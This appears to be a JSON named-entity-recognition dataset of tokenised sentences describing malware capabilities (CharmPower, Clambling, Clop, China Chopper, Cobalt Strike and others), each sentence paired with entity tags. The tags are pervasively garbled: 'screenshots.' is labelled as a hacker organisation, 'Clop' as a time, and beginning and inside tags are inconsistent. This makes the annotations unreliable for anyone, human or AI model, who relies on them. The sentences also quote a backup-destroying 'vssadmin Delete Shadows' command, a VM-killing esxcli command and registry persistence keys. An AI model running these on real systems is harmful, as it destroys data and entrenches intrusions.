- ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "remove", - "persistence-related", - "artifacts", - "from", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "use", - "PowerShell", - "for", - "payload", - "execution", - "and", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "has", - "the", - "ability", - "to", - "list", - "running", - "processes", - "through", - "the", - "use", - "of", - "`tasklist`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "has", - "the", - "ability", - "to", - "enumerate", - "`Uninstall`", - "registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "has", - "the", - "ability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "list", - "the", - "installed", - "applications", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "send", - "additional", - "modules", - "over", - "C2", - "encoded", - "with", - "base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "send", - "additional", - "modules", - "over", - "C2", - "encrypted", - "with", - "a", - "simple", - "substitution", - "cipher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "enumerate", - "the", - "OS", - "version", - "and", - "computer", - "name", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "has", - "the", - "ability", - "to", - "use", - "<code>ipconfig</code>", - "to", - "enumerate", - "system", - "network", - "settings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "use", - "`netsh", - "wlan", - "show", - "profiles`", - "to", - "list", - "specific", - "Wi-Fi", - "profile", - "details." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "use", - "HTTP", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "download", - "additional", - "modules", - "from", - "actor-controlled", - "Amazon", - "S3", - "buckets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "C#", - "implementation", - "of", - "the", - "CharmPower", - "command", - "execution", - "module", - "can", - "use", - "<code>cmd</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "CharmPower", - "can", - "use", - "`wmic`", - "to", - "gather", - "information", - "from", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cheerscrypt", - "can", - "encrypt", - "data", - "on", - "victim", - "machines", - "using", - "a", - "Sosemanuk", - "stream", - "cipher", - "with", - "an", - "Elliptic-curve", - "Diffie–Hellman", - "(ECDH)", - "generated", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cheerscrypt", - "can", - "search", - "for", - "log", - "and", - "VMware-related", - "files", - "with", - ".log,", - ".vmdk,", - ".vmem,", - ".vswp,", - "and", - ".vmsn", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Cheerscrypt", - "has", - "the", - "ability", - "to", - "terminate", - "VM", - "processes", - "on", - "compromised", - "hosts", - "through", - "execution", - "of", - "`esxcli", - "vm", - "process", - "kill`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "variants", - "of", - "Cherry", - "Picker", - "use", - "AppInit_DLLs", - "to", - "achieve", - "persistence", - "by", - "creating", - "the", - "following", - "Registry", - "key:", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows", - "\"AppInit_DLLs\"=\"pserver32.dll\"</code>" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Cherry", - "Picker", - "exfiltrates", - "files", - "over", - "FTP." - ], - "ner_tags": [ - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Recent", - "versions", - "of", - "Cherry", - "Picker", - "delete", - "files", - "and", - "registry", - "keys", - "created", - "by", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-Tool", - "B-SecTeam", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "upload", - "local", - "files." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "list", - "directory", - "contents." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "download", - "remote", - "files." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "spider", - "authentication", - "portals." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "perform", - "brute", - "force", - "password", - "guessing", - "against", - "authentication", - "portals." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "client", - "component", - "is", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "can", - "change", - "the", - "timestamp", - "of", - "files." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "executes", - "code", - "sent", - "via", - "HTTP", - "POST", - "commands." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "is", - "a", - "Web", - "Shell", - "payload." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "China", - "Chopper's", - "server", - "component", - "is", - "capable", - "of", - "opening", - "a", - "command", - "terminal." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chinoxy", - "can", - "use", - "a", - "digitally", - "signed", - "binary", - "(\"Logitech", - "Bluetooth", - "Wizard", - "Host", - "Process\")", - "to", - "load", - "its", - "dll", - "into", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Chinoxy", - "dropping", - "function", - "can", - "initiate", - "decryption", - "of", - "its", - "config", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chinoxy", - "has", - "encrypted", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chinoxy", - "has", - "used", - "the", - "name", - "`eoffice.exe`", - "in", - "attempt", - "to", - "appear", - "as", - "a", - "legitimate", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chinoxy", - "has", - "established", - "persistence", - "via", - "the", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "registry", - "key", - "and", - "by", - "loading", - "a", - "dropper", - "to", - "`(%COMMON_", - "STARTUP%\\\\eoffice.exe)`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "encrypt", - "and", - "store", - "on", - "disk", - "collected", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "collect", - "data", - "from", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "decrypt", - "its", - "encrypted", - "internal", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "encrypt", - "sections", - "of", - "its", - "code", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "exfiltrate", - "collected", - "data", - "via", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "download", - "its", - "code", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "store", - "captured", - "system", - "information", - "locally", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "use", - "Windows", - "API", - "including", - "`WinExec`", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "set", - "itself", - "to", - "sleep", - "before", - "requesting", - "a", - "new", - "command", - "from", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "has", - "the", - "ability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Chrommme", - "has", - "the", - "ability", - "to", - "list", - "drives", - "and", - "obtain", - "the", - "computer", - "name", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "enumerate", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chrommme", - "can", - "retrieve", - "the", - "username", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "use", - "Telnet", - "for", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "use", - "Dropbox", - "to", - "download", - "malicious", - "payloads,", - "send", - "commands,", - "and", - "receive", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "I-Features", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "bypass", - "UAC", - "using", - "a", - "`passuac.dll`", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "capture", - "and", - "store", - "clipboard", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "store", - "a", - "file", - "named", - "`mpsvc.dll`,", - "which", - "opens", - "a", - "malicious", - "`mpsvc.mui`", - "file,", - "in", - "the", - "same", - "folder", - "as", - "the", - "legitimate", - "Microsoft", - "executable", - "`MsMpEng.exe`", - "to", - "gain", - "execution." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "deobfuscate", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "send", - "files", - "from", - "a", - "victim's", - "machine", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "browse", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "set", - "its", - "file", - "attributes", - "to", - "hidden." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "capture", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "gained", - "execution", - "through", - "luring", - "victims", - "into", - "opening", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "set", - "and", - "delete", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "use", - "TCP", - "and", - "UDP", - "for", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "The", - "Clambling", - "executable", - "has", - "been", - "obfuscated", - "when", - "dropped", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Clambling", - "dropper", - "can", - "use", - "PowerShell", - "to", - "download", - "the", - "malware." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "enumerate", - "processes", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "execute", - "binaries", - "through", - "process", - "hollowing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "inject", - "into", - "the", - "`svchost.exe`", - "process", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "enumerate", - "Registry", - "keys,", - "including", - "<code>KEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir</code>", - "to", - "search", - "for", - "a", - "bitcoin", - "wallet." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "establish", - "persistence", - "by", - "adding", - "a", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "create", - "and", - "start", - "services", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "been", - "delivered", - "to", - "victim's", - "machines", - "through", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "discover", - "the", - "hostname,", - "computer", - "name,", - "and", - "Windows", - "version", - "of", - "a", - "targeted", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "enumerate", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "identify", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "determine", - "the", - "current", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "wait", - "30", - "minutes", - "before", - "initiating", - "contact", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "record", - "screen", - "content", - "in", - "AVI", - "format." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "has", - "the", - "ability", - "to", - "communicate", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "use", - "cmd.exe", - "for", - "command", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clambling", - "can", - "register", - "itself", - "as", - "a", - "system", - "service", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "use", - "code", - "signing", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "encrypt", - "files", - "using", - "AES,", - "RSA,", - "and", - "RC4", - "and", - "will", - "add", - "the", - "\".clop\"", - "extension", - "to", - "encrypted", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "B-Way", - "B-Way", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "used", - "a", - "simple", - "XOR", - "operation", - "to", - "decrypt", - "strings." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "uninstall", - "or", - "disable", - "security", - "products." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "searched", - "folders", - "and", - "subfolders", - "for", - "files", - "to", - "encrypt." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "delete", - "the", - "shadow", - "volumes", - "with", - "<code>vssadmin", - "Delete", - "Shadows", - "/all", - "/quiet</code>", - "and", - "can", - "use", - "bcdedit", - "to", - "disable", - "recovery", - "options." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "make", - "modifications", - "to", - "Registry", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "use", - "msiexec.exe", - "to", - "disable", - "security", - "tools", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "used", - "built-in", - "API", - "functions", - "such", - "as", - "WNetOpenEnumW(),", - "WNetEnumResourceW(),", - "WNetCloseEnum(),", - "GetProcAddress(),", - "and", - "VirtualAlloc()." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Clop", - "can", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "enumerate", - "all", - "processes", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "search", - "for", - "processes", - "with", - "antivirus", - "and", - "antimalware", - "product", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "kill", - "several", - "processes", - "and", - "services", - "related", - "to", - "backups", - "and", - "security", - "solutions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "been", - "packed", - "to", - "help", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "checked", - "the", - "keyboard", - "language", - "using", - "the", - "GetKeyboardLayout()", - "function", - "to", - "avoid", - "installation", - "on", - "Russian-language", - "or", - "other", - "Commonwealth", - "of", - "Independent", - "States-language", - "machines;", - "it", - "will", - "also", - "check", - "the", - "<code>GetTextCharset</code>", - "function." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "has", - "used", - "the", - "<code>sleep</code>", - "command", - "to", - "avoid", - "sandbox", - "detection." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Clop", - "can", - "use", - "cmd.exe", - "to", - "help", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "variant", - "of", - "CloudDuke", - "uses", - "a", - "Microsoft", - "OneDrive", - "account", - "to", - "exchange", - "commands", - "and", - "stolen", - "data", - "with", - "its", - "operators." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CloudDuke", - "downloads", - "and", - "executes", - "additional", - "malware", - "from", - "either", - "a", - "Web", - "address", - "or", - "a", - "Microsoft", - "OneDrive", - "account." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "variant", - "of", - "CloudDuke", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "RSA", - "asymmetric", - "encryption", - "with", - "PKCS1", - "padding", - "to", - "encrypt", - "data", - "sent", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "download", - "a", - "hosted", - "\"beacon\"", - "payload", - "using", - "BITSAdmin." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", 